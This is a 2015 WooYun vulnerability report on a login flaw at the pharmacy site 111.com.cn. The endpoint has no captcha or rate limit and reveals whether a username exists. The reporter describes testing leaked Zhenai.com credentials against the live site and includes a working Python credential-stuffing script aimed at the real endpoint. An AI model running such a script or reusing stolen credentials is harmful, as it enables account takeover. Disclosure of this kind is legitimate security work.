当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-089957

漏洞标题:壹药网某系统设计缺陷可方便撞库

相关厂商:111.com.cn

漏洞作者: 一天到晚吃

提交时间:2015-01-04 19:59

修复时间:2015-01-05 17:14

公开时间:2015-01-05 17:14

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-04: 细节已通知厂商并且等待厂商处理中
2015-01-04: 厂商已经确认,细节仅向厂商公开
2015-01-05: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

为啥什么防范都没有?

详细说明:

http://m.111.com.cn/question/login/
这个接口登陆,没有验证码,也不限制登陆失败次数.居然还会告诉你是用户名不存在还是密码错误,增加撞库的成功率.
虽然说增加了撞库的成功率,但是我去下珍爱网的裤子去撞,随机取1w条数据就只撞出来1条能登陆成功的帐号密码.

x.jpg


漏洞证明:

x.jpg


附上自己的扫号时的代码

import requests
f=open("f1.txt","r")
all=f.readlines();
f.close()
PASSWORD_NOT_CORRECT=[]
OK=[]
try:
for each in all:
username=each.split(" ")[0]
username=username.strip()
password=each.split(" ")[1]
password=password.strip()
print username+" "+password
payload={"user_name":username,"user_psw":password}
res=requests.post("http://m.111.com.cn/question/login/",data=payload)
if res.text=='{"result":0,"errorCode":" \u7528\u6237\u4e0d\u5b58\u5728\uff01"}':
print "user does not exsist!"
elif res.text=='{"result":0,"errorCode":" \u5bc6\u7801\u9519\u8bef\uff01"}':
print "password not correct!"
PASSWORD_NOT_CORRECT.append(username+" "+password)
else:
if password!="":
OK.append(username+" "+password)
print "OK!"
except Exception,e:
print "exception:"
print e
print "-------FOUND----------"
print OK
print "-------PASSWORD NOT THE ONE------"
print PASSWORD_NOT_CORRECT
exit
print "-------FOUND----------"
print OK
print "-------PASSWORD NOT THE ONE------"
print PASSWORD_NOT_CORRECT

修复方案:

厂商更专业

版权声明:转载请注明来源 一天到晚吃@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2015-01-04 20:14

厂商回复:

感谢您对壹药网的支持,我们会尽快修复该漏洞的。
另外来了也别空着手回去了,冈本 情趣内衣来一套呗。

最新状态:

2015-01-05:漏洞已修复,感谢各位白帽子对壹药网的支持。